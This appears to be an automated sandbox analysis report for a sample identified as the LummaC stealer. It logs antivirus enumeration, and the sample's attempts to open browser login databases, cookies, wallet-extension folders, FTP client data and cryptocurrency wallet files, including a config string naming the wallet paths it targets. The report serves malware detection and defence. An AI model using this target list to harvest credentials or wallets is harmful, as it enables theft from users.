Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	2_2_0019F5E6
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	2_2_0019F6BB
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	2_2_0019F706
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0019F7AD

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 0_2_0018E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0018E6D7

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: setupx 2.exe1.exe, 00000003.00000003.1778410150.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: setupx 2.exe1.exe PID: 5712, type: MEMORYSTR
Source: Yara match	File source: 3.2.setupx 2.exe1.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.setupx 2.exe1.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2242806640.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: setupx 2.exe1.exe, 00000003.00000003.1061477221.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum"
Source: setupx 2.exe1.exe, 00000003.00000003.1061477221.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"
Source: setupx 2.exe1.exe, 00000003.00000003.1061477221.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty_"
Source: setupx 2.exe1.exe, 00000003.00000003.1778278456.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: setupx 2.exe1.exe, 00000003.00000003.1061156152.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletL
Source: setupx 2.exe1.exe, 00000003.00000003.1061477221.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: setupx 2.exe1.exe, 00000003.00000003.1778278456.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: setupx 2.exe1.exe, 00000003.00000003.1087834589.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: setupx 2.exe1.exe, 00000003.00000003.1087834589.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
